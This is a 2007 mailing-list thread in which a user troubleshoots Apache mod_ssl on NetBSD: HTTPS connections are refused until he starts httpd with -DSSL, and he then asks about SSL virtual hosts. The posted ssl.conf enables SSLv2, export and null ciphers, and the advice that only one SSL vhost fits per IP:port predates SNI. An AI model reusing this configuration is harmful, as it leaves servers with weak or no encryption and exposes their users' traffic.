Hi people,

I'm new to this list, so hello.

I've been trying to get https working with apache 2.0.59 on NetBSD
3.99 today, and it's
beginning to make my face ache.

Basically when I try to view a page via https I get connection
refused. Apache is compiled with mod_ssl.c, I have openssl installed.

This is what I've done so far:

1) Copied the example openssl cfg from examples to
/etc/openssl/openssl.cnf

2)Generated my server key, then pem file then the csr and crt. 

3)Then coppied them all into ssl.key (server.pem, server.key),
ssl.csr (server.csr) and ssl.crt (server.crt). This is where my
ssl.conf expects them.

4) Made sure ssl.conf is pointing to these files properly and is
listening on port 443 (Listen :443)

5) Made sure ssl.conf is included in httpd.conf properly

6) check that mod_ssl.c is compiled in with https -l

7) checked my apache access and error logs - nothing !

.... And still nothing, it can't be listening on 443.

If I do the following:

#openssl s_client -connect localhost:443 -state -debug

I get:

connect: Connection refused
connect:errno=61
I've even tried copying all my virtual hosts and changing :80 to
:443, still nothing.

This is really the first time I've ever touched ssl, so I'm hoping
I'm missing something really dumb. I've basically just got the
standard ssl.conf example modified ever so slightly so that things
point in the right place.

?

Any ideas?


Cheers
Glyn


      ___________________________________________________________ 
Yahoo! Mail is the world's favourite email. Don't settle for less, sign up for
your free account today http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  1 01:30:08 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5BC0B14D876; Wed,  1 Aug 2007 01:30:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id 4AA8114D843
	for ; Wed,  1 Aug 2007 01:30:02 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l6VNTupA081476
	for ; Tue, 31 Jul 2007 17:29:56 -0600 (MDT)
Message-ID: <46AFC5EE.40005@allez-oop.net>
Date: Tue, 31 Jul 2007 17:29:50 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.5 (X11/20070730)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Apache and mod_ssl - refusing connections on https?
References: <985092.25470.qm@web86808.mail.ukl.yahoo.com>
In-Reply-To: <985092.25470.qm@web86808.mail.ukl.yahoo.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

SSLEngine On?

Glyn Astill wrote:
> Hi people,
> 
> I'm new to this list, so hello.
> 
> I've been trying to get https working with apache 2.0.59 on NetBSD
> 3.99 today, and it's
> beginning to make my face ache.
> 
> Basically when I try to view a page via https I get connection
> refused. Apache is compiled with mod_ssl.c, I have openssl installed.
> 
> This is what I've done so far:
> 
> 1) Copied the example openssl cfg from examples to
> /etc/openssl/openssl.cnf
> 
> 2)Generated my server key, then pem file then the csr and crt. 
> 
> 3)Then coppied them all into ssl.key (server.pem, server.key),
> ssl.csr (server.csr) and ssl.crt (server.crt). This is where my
> ssl.conf expects them.
> 
> 4) Made sure ssl.conf is pointing to these files properly and is
> listening on port 443 (Listen :443)
> 
> 5) Made sure ssl.conf is included in httpd.conf properly
> 
> 6) check that mod_ssl.c is compiled in with https -l
> 
> 7) checked my apache access and error logs - nothing !
> 
> .... And still nothing, it can't be listening on 443.
> 
> If I do the following:
> 
> #openssl s_client -connect localhost:443 -state -debug
> 
> I get:
> 
> connect: Connection refused
> connect:errno=61
> I've even tried copying all my virtual hosts and changing :80 to
> :443, still nothing.
> 
> This is really the first time I've ever touched ssl, so I'm hoping
> I'm missing something really dumb. I've basically just got the
> standard ssl.conf example modified ever so slightly so that things
> point in the right place.
> 
> ?
> 
> Any ideas?
> 
> 
> Cheers
> Glyn
> 
> 
>       ___________________________________________________________ 
> Yahoo! Mail is the world's favourite email. Don't settle for less, sign up for
> your free account today http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org


-- 
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug  1 10:27:52 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 1DD2114D88C; Wed,  1 Aug 2007 10:27:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25401.mail.ukl.yahoo.com (web25401.mail.ukl.yahoo.com [217.12.10.135])
	by master.modssl.org (Postfix) with SMTP id A2E3F14D843
	for ; Wed,  1 Aug 2007 10:27:51 +0200 (CEST)
Received: (qmail 87592 invoked by uid 60001); 1 Aug 2007 08:27:36 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=4WOf0TtPxWKAfFewe5t9ShDtVQROIKxg0kZzac/vAhfOVFpPCk9BslCvfjJJ1P3DOY2VEnCMoqv8HbGx25j08hzqgBmoeEjCPRrI+vYRp4gd8faMNL/SH1GrHY+2MdT7ynYA9yesXincPaxcEFKUlXrjFY4zZyOHcTdYqdk96jY=;
X-YMail-OSG: ucYDT9UVM1lTd7DUUEDU7oV44YgrTqHIr_lbsGDLyW_GADf.fHtuUsj87rqLhHzN1ddn8zJjK1eqU7sH3D1S0mVGGQzyTT1SVadtvbcJv34tQyV4HBaYi9GUyMA-
Received: from [213.83.65.106] by web25401.mail.ukl.yahoo.com via HTTP; Wed, 01 Aug 2007 09:27:36 BST
Date: Wed, 1 Aug 2007 09:27:36 +0100 (BST)
From: Glyn Astill 
Subject: Re: Apache and mod_ssl - refusing connections on https?
To: modssl-users@modssl.org
In-Reply-To: <46AFC5EE.40005@allez-oop.net>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <132356.84738.qm@web25401.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Yes, I have SSLEngine On in ssl.conf, here's my ssl.conf file:

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin


Listen 443
Listen my.ip.ad.dr:443

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin

SSLSessionCache         dbm:/var/run/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  file:/var/run/ssl_mutex



DocumentRoot "/usr/pkg/share/httpd/htdocs"
ServerName www.mydomain.net:443
ServerAdmin admin@mydomain.net
ErrorLog /var/log/httpd/error_log
TransferLog /var/log/httpd/access_log

SSLEngine on

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateFile /usr/pkg/etc/httpd/ssl.crt/server.crt
SSLCertificateKeyFile /usr/pkg/etc/httpd/ssl.key/server.pem


    SSLOptions +StdEnvVars


    SSLOptions +StdEnvVars


SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0
CustomLog /var/log/httpd/ssl_request_log \
          "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"

                                  



Any ideas?

--- "Omar W. Hannet"  wrote:

> SSLEngine On?
> 
> Glyn Astill wrote:
> > Hi people,
> > 
> > I'm new to this list, so hello.
> > 
> > I've been trying to get https working with apache 2.0.59 on
> NetBSD
> > 3.99 today, and it's
> > beginning to make my face ache.
> > 
> > Basically when I try to view a page via https I get connection
> > refused. Apache is compiled with mod_ssl.c, I have openssl
> installed.
> > 
> > This is what I've done so far:
> > 
> > 1) Copied the example openssl cfg from examples to
> > /etc/openssl/openssl.cnf
> > 
> > 2)Generated my server key, then pem file then the csr and crt. 
> > 
> > 3)Then coppied them all into ssl.key (server.pem, server.key),
> > ssl.csr (server.csr) and ssl.crt (server.crt). This is where my
> > ssl.conf expects them.
> > 
> > 4) Made sure ssl.conf is pointing to these files properly and is
> > listening on port 443 (Listen :443)
> > 
> > 5) Made sure ssl.conf is included in httpd.conf properly
> > 
> > 6) check that mod_ssl.c is compiled in with https -l
> > 
> > 7) checked my apache access and error logs - nothing !
> > 
> > .... And still nothing, it can't be listening on 443.
> > 
> > If I do the following:
> > 
> > #openssl s_client -connect localhost:443 -state -debug
> > 
> > I get:
> > 
> > connect: Connection refused
> > connect:errno=61
> > I've even tried copying all my virtual hosts and changing :80 to
> > :443, still nothing.
> > 
> > This is really the first time I've ever touched ssl, so I'm
> hoping
> > I'm missing something really dumb. I've basically just got the
> > standard ssl.conf example modified ever so slightly so that
> things
> > point in the right place.
> > 
> > ?
> > 
> > Any ideas?
> > 
> > 
> > Cheers
> > Glyn
> > 
> > 
> >       ___________________________________________________________
> 
> > Yahoo! Mail is the world's favourite email. Don't settle for
> less, sign up for
> > your free account today
>
http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html
> 
> >
>
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                  
> www.modssl.org
> > User Support Mailing List                     
> modssl-users@modssl.org
> > Automated List Manager                           
> majordomo@modssl.org
> 
> 
> -- 
> Omar W. Hannet
> http://www.allez-oop.net/
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                  
> www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



      ___________________________________________________________
Yahoo! Answers - Got a question? Someone out there knows the answer. Try it
now.
http://uk.answers.yahoo.com/ 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  2 00:03:07 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id EDEE414D9D6; Thu,  2 Aug 2007 00:03:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25408.mail.ukl.yahoo.com (web25408.mail.ukl.yahoo.com [217.12.10.142])
	by master.modssl.org (Postfix) with SMTP id CDCD214D84F
	for ; Thu,  2 Aug 2007 00:03:03 +0200 (CEST)
Received: (qmail 92428 invoked by uid 60001); 1 Aug 2007 22:02:58 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=PSa8JFoRN4DBvnJOatw2/sj/a8067XWqZVlzfKxT4p8x35D2xsN43epF709+becFdxXWmWq5AYpd8TYhQ6Ndae2MrxODRcI+se+V+bdZVsm72Oa5snH6LJv78O0lYtacv5dVljHoWBW3FTTp1NRfgOklDO5l933/3K/K5ftJoKs=;
X-YMail-OSG: tbTlHxcVM1mIoNqPgzFseMW59fOfYVVuhX3nmETpXDjpueFYZNf1Pz1bjkGUWINJTvoE0FF7UmqVOu9YYYUJDkPVkwHLbieTliJ5GVtcOuia3zGTsywHSHn_BUA-
Received: from [81.104.240.100] by web25408.mail.ukl.yahoo.com via HTTP; Wed, 01 Aug 2007 23:02:58 BST
Date: Wed, 1 Aug 2007 23:02:58 +0100 (BST)
From: Glyn Astill 
Subject: Re: Apache and mod_ssl - refusing connections on https?
To: modssl-users@modssl.org
In-Reply-To: <132356.84738.qm@web25401.mail.ukl.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <793235.89407.qm@web25408.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I figured it out people, I just needed to start httpd with -DSSL.

SO I was being dumb.

--- Glyn Astill  wrote:

> Yes, I have SSLEngine On in ssl.conf, here's my ssl.conf file:
> 
> SSLRandomSeed startup builtin
> SSLRandomSeed connect builtin
> 
> 
> Listen 443
> Listen my.ip.ad.dr:443
> 
> AddType application/x-x509-ca-cert .crt
> AddType application/x-pkcs7-crl    .crl
> 
> SSLPassPhraseDialog  builtin
> 
> SSLSessionCache         dbm:/var/run/ssl_scache
> SSLSessionCacheTimeout  300
> 
> SSLMutex  file:/var/run/ssl_mutex
> 
> 
> 
> DocumentRoot "/usr/pkg/share/httpd/htdocs"
> ServerName www.mydomain.net:443
> ServerAdmin admin@mydomain.net
> ErrorLog /var/log/httpd/error_log
> TransferLog /var/log/httpd/access_log
> 
> SSLEngine on
> 
> SSLCipherSuite
> ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
> 
> SSLCertificateFile /usr/pkg/etc/httpd/ssl.crt/server.crt
> SSLCertificateKeyFile /usr/pkg/etc/httpd/ssl.key/server.pem
> 
> 
>     SSLOptions +StdEnvVars
> 
> 
>     SSLOptions +StdEnvVars
> 
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>          nokeepalive ssl-unclean-shutdown \
>          downgrade-1.0 force-response-1.0
> CustomLog /var/log/httpd/ssl_request_log \
>           "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
> 
>                                   
> 
> 
> 
> Any ideas?
> 
> --- "Omar W. Hannet"  wrote:
> 
> > SSLEngine On?
> > 
> > Glyn Astill wrote:
> > > Hi people,
> > > 
> > > I'm new to this list, so hello.
> > > 
> > > I've been trying to get https working with apache 2.0.59 on
> > NetBSD
> > > 3.99 today, and it's
> > > beginning to make my face ache.
> > > 
> > > Basically when I try to view a page via https I get connection
> > > refused. Apache is compiled with mod_ssl.c, I have openssl
> > installed.
> > > 
> > > This is what I've done so far:
> > > 
> > > 1) Copied the example openssl cfg from examples to
> > > /etc/openssl/openssl.cnf
> > > 
> > > 2)Generated my server key, then pem file then the csr and crt. 
> > > 
> > > 3)Then coppied them all into ssl.key (server.pem, server.key),
> > > ssl.csr (server.csr) and ssl.crt (server.crt). This is where my
> > > ssl.conf expects them.
> > > 
> > > 4) Made sure ssl.conf is pointing to these files properly and
> is
> > > listening on port 443 (Listen :443)
> > > 
> > > 5) Made sure ssl.conf is included in httpd.conf properly
> > > 
> > > 6) check that mod_ssl.c is compiled in with https -l
> > > 
> > > 7) checked my apache access and error logs - nothing !
> > > 
> > > .... And still nothing, it can't be listening on 443.
> > > 
> > > If I do the following:
> > > 
> > > #openssl s_client -connect localhost:443 -state -debug
> > > 
> > > I get:
> > > 
> > > connect: Connection refused
> > > connect:errno=61
> > > I've even tried copying all my virtual hosts and changing :80
> to
> > > :443, still nothing.
> > > 
> > > This is really the first time I've ever touched ssl, so I'm
> > hoping
> > > I'm missing something really dumb. I've basically just got the
> > > standard ssl.conf example modified ever so slightly so that
> > things
> > > point in the right place.
> > > 
> > > ?
> > > 
> > > Any ideas?
> > > 
> > > 
> > > Cheers
> > > Glyn
> > > 
> > > 
> > >      
> ___________________________________________________________
> > 
> > > Yahoo! Mail is the world's favourite email. Don't settle for
> > less, sign up for
> > > your free account today
> >
>
http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html
> > 
> > >
> >
>
______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)                  
> > www.modssl.org
> > > User Support Mailing List                     
> > modssl-users@modssl.org
> > > Automated List Manager                           
> > majordomo@modssl.org
> > 
> > 
> > -- 
> > Omar W. Hannet
> > http://www.allez-oop.net/
> >
>
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                  
> > www.modssl.org
> > User Support Mailing List                     
> > modssl-users@modssl.org
> > Automated List Manager                           
> > majordomo@modssl.org
> > 
> 
> 
> 
>       ___________________________________________________________
> Yahoo! Answers - Got a question? Someone out there knows the
> answer. Try it
> now.
> http://uk.answers.yahoo.com/ 
>
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                  
> www.modssl.org
> User Support Mailing List                     
> modssl-users@modssl.org
> Automated List Manager                           
> majordomo@modssl.org
> 



      ___________________________________________________________ 
Yahoo! Mail is the world's favourite email. Don't settle for less, sign up for
your free account today http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  2 01:11:18 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C503014D8AA; Thu,  2 Aug 2007 01:11:18 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25410.mail.ukl.yahoo.com (web25410.mail.ukl.yahoo.com [217.12.10.201])
	by master.modssl.org (Postfix) with SMTP id D371714D84F
	for ; Thu,  2 Aug 2007 01:11:17 +0200 (CEST)
Received: (qmail 25593 invoked by uid 60001); 1 Aug 2007 23:11:12 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=eYF2owQL1AEN9v6Fwtl5XNbxlvxRSZjQvXGjVoVbMhSXMKB/bISZLi7dE/H1rsVWiCl6j84BlgnA7pXH5Dd4Ln5Lz46WWgXzqjkekaoyWC1WWUL/0UYjsUf9KJPM6H4PdvX5QM0nwUlbDvA1N+37ANg0PTB0aW3neL+XBguOGbE=;
X-YMail-OSG: iiAso1wVM1mOyCbZ4MllQ1ugjfaXN.Ge5NFMCCQLjshR8XVMJZ1WImRXUWH3xkspKeFmqOnW6N9dJztCRWhBsbrLkJY2i.WX9Pip9jkR2DRfyCNYoRpUsANLtnE-
Received: from [81.104.240.100] by web25410.mail.ukl.yahoo.com via HTTP; Thu, 02 Aug 2007 00:11:12 BST
Date: Thu, 2 Aug 2007 00:11:12 +0100 (BST)
From: Glyn Astill 
Subject: SSL and Virtual hosts?
To: modssl-users@modssl.org
In-Reply-To: <132356.84738.qm@web25401.mail.ukl.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <286828.7555.qm@web25410.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi people,

So I got ssl started, and now I'm trying to sort out my virtual hosts
but I cant seem to get them to work. For example I'm putting the
VirtualHosts below between the IfDefine SSL tags in ssl.conf. Any
pointers would be ace. Thanks.

NameVirtualHost *:443


     ServerName mail.mydomain.net
     DocumentRoot /usr/pkg/share/mymail

     SSLEngine on
     SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
     SSLCertificateFile /usr/pkg/etc/httpd/ssl.crt/server.crt
     SSLCertificateKeyFile /usr/pkg/etc/httpd/ssl.key/server.pem
     
         SSLOptions +StdEnvVars
     
     
         SSLOptions +StdEnvVars
     

     SetEnvIf User-Agent ".*MSIE.*" \
              nokeepalive ssl-unclean-shutdown \
              downgrade-1.0 force-response-1.0
     CustomLog /var/log/httpd/ssl_request_log \
               "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


     ServerName mydomain.net
     ServerAlias *.mydomain.net
     DocumentRoot /usr/pkg/share/httpd/htdocs/

     SSLEngine on
     SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
     SSLCertificateFile /usr/pkg/etc/httpd/ssl.crt/server.crt
     SSLCertificateKeyFile /usr/pkg/etc/httpd/ssl.key/server.pem
     
         SSLOptions +StdEnvVars
     
     
         SSLOptions +StdEnvVars
     

     SetEnvIf User-Agent ".*MSIE.*" \
              nokeepalive ssl-unclean-shutdown \
              downgrade-1.0 force-response-1.0
     CustomLog /var/log/httpd/ssl_request_log \
               "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




      ___________________________________________________________ 
Yahoo! Mail is the world's favourite email. Don't settle for less, sign up for
your free account today http://uk.rd.yahoo.com/evt=44106/*http://uk.docs.yahoo.com/mail/winter07.html 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  2 01:13:36 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 2ECB414D9D6; Thu,  2 Aug 2007 01:13:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web25408.mail.ukl.yahoo.com (web25408.mail.ukl.yahoo.com [217.12.10.142])
	by master.modssl.org (Postfix) with SMTP id 4F80614D8A6
	for ; Thu,  2 Aug 2007 01:13:34 +0200 (CEST)
Received: (qmail 74107 invoked by uid 60001); 1 Aug 2007 23:13:29 -0000
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.co.uk;
  h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID;
  b=e6UUFUXo3QCcXyIww/+gnpventO//354jLjNOMQ9Mk3TlyKwAWJiYQdhcvSHGz5VCaV7SoMATTv7SlygiFjwqEVvQVwruj1ACCB8g5M6Not0PE1f6CsDGnUzwTS9O5OZymLI0VM1eYbngcm/Tr/7O5Pp7pcG0LZK0ZiYMBi8sz4=;
X-YMail-OSG: 1.Y51e8VM1lBhxf_2riZgGFh4UlpHq9VuE50u5bmIpCwWuZbo1zFx6yPteGMXaqGLw76Cq8VWEuABrVByMfS.yT61XjL7AIIfGut8Ctih6IXmZqpUcU2rl4njxU-
Received: from [81.104.240.100] by web25408.mail.ukl.yahoo.com via HTTP; Thu, 02 Aug 2007 00:13:29 BST
Date: Thu, 2 Aug 2007 00:13:29 +0100 (BST)
From: Glyn Astill 
Subject: SSL and Virtual hosts?
To: modssl-users@modssl.org
In-Reply-To: <132356.84738.qm@web25401.mail.ukl.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Message-ID: <727771.71540.qm@web25408.mail.ukl.yahoo.com>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Glyn Astill 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi people,

So I got ssl started, and now I'm trying to sort out my virtual hosts
but I can't seem to get them to work.

What I want to do is get https://mail.mydomain.net to take me to my
mail directory and https://www.mydomain.net to take me to my htdocs,
just like I can on http.

For example I'm putting the VirtualHosts below between the IfDefine
SSL tags in ssl.conf. Any pointers would be ace. Thanks.


NameVirtualHost *:443


     ServerName mail.mydomain.net
     DocumentRoot /usr/pkg/share/mymail

     SSLEngine on
     SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
     SSLCertificateFile /usr/pkg/etc/httpd/ssl.crt/server.crt
     SSLCertificateKeyFile /usr/pkg/etc/httpd/ssl.key/server.pem
     
         SSLOptions +StdEnvVars
     
     
         SSLOptions +StdEnvVars
     

     SetEnvIf User-Agent ".*MSIE.*" \
              nokeepalive ssl-unclean-shutdown \
              downgrade-1.0 force-response-1.0
     CustomLog /var/log/httpd/ssl_request_log \
               "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"


     ServerName mydomain.net
     ServerAlias *.mydomain.net
     DocumentRoot /usr/pkg/share/httpd/htdocs/

     SSLEngine on
     SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL
     SSLCertificateFile /usr/pkg/etc/httpd/ssl.crt/server.crt
     SSLCertificateKeyFile /usr/pkg/etc/httpd/ssl.key/server.pem
     
         SSLOptions +StdEnvVars
     
     
         SSLOptions +StdEnvVars
     

     SetEnvIf User-Agent ".*MSIE.*" \
              nokeepalive ssl-unclean-shutdown \
              downgrade-1.0 force-response-1.0
     CustomLog /var/log/httpd/ssl_request_log \
               "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"




      ___________________________________________________________
Yahoo! Answers - Got a question? Someone out there knows the answer. Try it
now.
http://uk.answers.yahoo.com/ 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Aug  2 03:17:28 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 461F414D89E; Thu,  2 Aug 2007 03:17:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from defout.telus.net (outbound05.telus.net [199.185.220.224])
	by master.modssl.org (Postfix) with ESMTP id AAB9114D84F
	for ; Thu,  2 Aug 2007 03:17:23 +0200 (CEST)
Received: from priv-edtnaa05.telusplanet.net ([137.186.246.196])
          by priv-edtnes90.telusplanet.net
          (InterMail vM.7.08.02.00 201-2186-121-20061213) with ESMTP
          id <20070802011717.YQAM4919.priv-edtnes90.telusplanet.net@priv-edtnaa05.telusplanet.net>;
          Wed, 1 Aug 2007 19:17:17 -0600
Received: from [192.168.2.100] (d137-186-246-196.abhsia.telus.net [137.186.246.196])
	by priv-edtnaa05.telusplanet.net (BorderWare MXtreme Infinity Mail Firewall) with ESMTP
	id 10VN1NW3XX; Wed,  1 Aug 2007 19:17:16 -0600 (MDT)
Message-ID: <46B130A4.7030905@daltons.ca>
Date: Wed, 01 Aug 2007 19:17:24 -0600
From: Aaron Dalton 
User-Agent: Thunderbird 2.0.0.5 (Windows/20070716)
MIME-Version: 1.0
To: modssl-users@modssl.org, glynastill@yahoo.co.uk
Subject: Re: SSL and Virtual hosts?
References: <727771.71540.qm@web25408.mail.ukl.yahoo.com>
In-Reply-To: <727771.71540.qm@web25408.mail.ukl.yahoo.com>
X-Enigmail-Version: 0.95.2
OpenPGP: id=8811D2A4;
	url=https://biglumber.com/x/web?qs=8811d2a4
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms060906060902050701090405"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Aaron Dalton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms060906060902050701090405
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Glyn Astill wrote:
> Hi people,
> 
> So I got ssl started, and now I'm trying to sort out my virtual hosts
> but I can't seem to get them to work.
> 

Due to the fundamental nature of SSL and virtual host resolution one may
not have more than one SSL-enabled virtual host per IP:port combination.

http://httpd.apache.org/docs/2.0/ssl/ssl_faq.html#vhosts

-- 
Aaron Dalton       |   Super Duper Games
aaron@daltons.ca   |   http://superdupergames.org

--------------ms060906060902050701090405
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIISOjCC
BggwggPwoAMCAQICAQEwDQYJKoZIhvcNAQEEBQAweTEQMA4GA1UEChMHUm9vdCBDQTEeMBwG
A1UECxMVaHR0cDovL3d3dy5jYWNlcnQub3JnMSIwIAYDVQQDExlDQSBDZXJ0IFNpZ25pbmcg
QXV0aG9yaXR5MSEwHwYJKoZIhvcNAQkBFhJzdXBwb3J0QGNhY2VydC5vcmcwHhcNMDUxMDE0
MDczNjU1WhcNMzMwMzI4MDczNjU1WjBUMRQwEgYDVQQKEwtDQWNlcnQgSW5jLjEeMBwGA1UE
